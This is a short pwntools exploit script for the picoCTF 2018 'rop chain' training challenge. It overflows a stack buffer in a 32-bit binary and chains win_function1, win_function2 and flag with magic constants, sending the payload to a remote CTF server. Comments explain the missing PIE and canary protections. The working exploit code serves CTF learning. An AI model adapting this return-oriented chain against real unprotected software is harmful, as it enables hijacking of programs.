picoctf_2018_rop chain
exp
from pwn import *
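# Walkthrough of a CTF training exercise: a stack-buffer overflow in a 32-bit
# binary, where the saved return address is overwritten with a chain of
# function addresses read from the ELF's own symbol table.
#
# NOTE(review): the chain uses elf.sym addresses as-is (no leak step) and
# reaches the return address with plain filler bytes. That presumably means the
# target was built without PIE and without a stack canary -- confirm with
# checksec. Building with both, and bounding the vulnerable read, is the
# mitigation this exercise is meant to illustrate.
context.log_level = 'debug'  # log every byte sent and received

proc_name = './PicoCTF_2018_rop_chain'
p = remote('node3.buuoj.cn', 27027)
elf = ELF(proc_name)

# Symbol addresses resolved from the local copy of the binary.
flag_addr = elf.sym['flag']
win_function1 = elf.sym['win_function1']
win_function2 = elf.sym['win_function2']

# Filler length up to the saved return address.
# Presumably 0x18 bytes of locals plus 4 bytes of saved frame pointer --
# confirm against the disassembly of the vulnerable function.
pad_len = 0x18 + 4

# Stack layout after the filler, one 32-bit little-endian word each (p32).
# NOTE(review): the two constants look like the values checked by
# win_function2 and flag respectively -- confirm against the binary.
payload = (
    b'a' * pad_len
    + p32(win_function1)
    + p32(win_function2)
    + p32(flag_addr)
    + p32(0xBAAAAAAD)
    + p32(0xDEADBAAD)
)

# Bytes delimiter: pwntools warns when a str is passed on Python 3.
p.sendlineafter(b'input>', payload)

# Two reads, return values discarded; with debug logging the received bytes
# still appear in the log.
p.recv()
p.recv()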